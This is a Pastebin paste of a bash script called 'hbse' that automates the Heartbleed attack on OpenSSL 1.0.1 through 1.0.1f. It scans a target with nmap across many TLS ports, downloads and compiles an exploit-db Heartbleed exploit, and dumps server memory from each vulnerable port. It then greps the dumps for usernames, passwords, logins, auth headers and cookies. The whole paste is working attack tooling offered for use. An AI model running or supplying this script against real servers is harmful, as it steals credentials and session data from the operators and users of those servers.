Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Heartbleed
- #Affected OpenSSL versions
- #The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive).
- #Later versions (1.0.1g and ulterior) and previous versions (1.0.0 branch and older) are not vulnerable.
- #Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.
- # Scan and exploit
- # ./hbse 127.0.0.1 # Interactive mode.
- # ./hbse --scan 127.0.0.1 # No interactive mode. Scan only.
- # ./hbse --exploit 127.0.0.1 # No interactive mode. Scan and exploit.
- # Requirements
- # apt-get install nmap
- # wget --no-check-certificate https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
- # mv ssl-heartbleed.nse /usr/share/nmap/scripts/.
- # wget http://nmap.org/svn/nselib/tls.lua
- # mv tls.lua /usr/share/nmap/nselib/.
- # wget -O heartbleed.c http://www.exploit-db.com/download/32791
- # gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto
- # SCRIPT
- # cat hbse
- #!/bin/bash
- ### TCP ####
- # 443 (HTTPS - HTTP over SSL)
- # 465 (SMTPS - SMTP over SSL)
- # 563 (NNTPS - NNTP over TLS/SSL)
- # 636 (LDAPS - LDAP over TLS/SSL)
- # 989 (FTPS Data - FTP Data over TLS/SSL)
- # 990 (FTPS Control - FTP Control over TLS/SSL)
- # 992 (Telnet over TLS/SSL)
- # 993 (IMAPS - IMAP over SSL)
- # 995 (POP3S - POP3 over SSL)
- # 1194 (OpenVPN)
- # 2484 (Oracle Database listening for SSL client)
- # 5061 (SIP over TLS)
- # 8443 (Apache Tomcat SSL)
- ### UDP ###
- # 563 (NNTPS - NNTP over TLS/SSL)
- # 636 (LDAPS - LDAP over TLS/SSL)
- # 4433 (OpenSSL)
- if [ $# -eq 1 ]; then
- ip="$1"
- elif [ $# -eq 2 ]; then
- se="$1"
- ip="$2"
- else
- exit
- fi
- nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"
- function print() {
- text="$1"
- color="$2"
- if [ "$color" == "gray" ]; then
- header="\e[38;5;250m"
- elif [ "$color" == "red" ]; then
- header="\e[91m"
- elif [ "$color" == "green" ]; then
- header="\e[92m"
- elif [ "$color" == "yellow" ]; then
- header="\e[93m"
- fi
- tail="\e[0m"
- echo -en $header$text$tail
- }
- print "Checking if $ip is vulnerable on port 443... " "gray"
- vulnerable="`nmap -p T:443 -script ssl-heartbleed $ip | grep VULNERABLE`"
- if [ "$vulnerable" != "" ]; then
- print "Yes\n" "green"
- print "Checking if it is vulnerable on other ports... " "gray"
- vports="`nmap -p $nports -script ssl-heartbleed $ip | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}'`"
- n="`echo "$ports" | wc -l`"
- if [ "$n" == 1 ]; then
- print "No\n" "red"
- w1="port"
- w2="it"
- w3="file"
- else
- print "Yes\n" "green"
- w1="ports"
- w2="them"
- w3="files"
- fi
- print "Vulnerable $w1:\n" "gray"
- print "$vports\n" "green"
- if [ "$se" == "--scan" ]; then exit
- elif [ "$se" == "--exploit" ]; then
- answer="Y"
- else
- print "Do you want to exploit $w2? [Yn] " "gray"
- read answer
- fi
- if [ "$answer" = "Y" ]; then
- print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
- exec 3<<< "$vports"
- while read port <&3; do
- print "+ Port [$port]\n" "gray"
- ofile="$ip.$port"
- if [ -f $ofile ]; then rm -f $ofile; fi
- if [ "$port" == "465" ]; then
- precmd='-c 0'
- elif [ "$port" == "993" ]; then
- precmd='-c 2'
- elif [ "$port" == "995" ]; then
- precmd='-c 1'
- else
- precmd=''
- fi
- ./heartbleed -s $ip -p $port -f $ofile $precmd -t 1 > /dev/null 2>&1
- if [ -f $ofile ]; then
- r="`strings $ofile | grep -i -e user -e pass -e login -e auth -e cookie -e basic`"
- print "$r\n" "green"
- if [ "$se" != "--exploit" ]; then
- print "Do you want to less the hexdump file? [Yn] " "gray"
- read answer
- if [ "$answer" = "Y" ]; then
- hexdump -C $ofile | less
- fi
- fi
- else
- print "Error: heartbleed did not work on port $port...\n" "yellow"
- fi
- done
- if [ "$se" != "--exploit" ]; then
- print "Do you want to delete the hexdump $w3? [Yn] " "gray"
- read answer
- if [ "$answer" = "Y" ]; then
- rm -f $ip.*
- fi
- fi
- fi
- else
- print "No\n" "red"
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement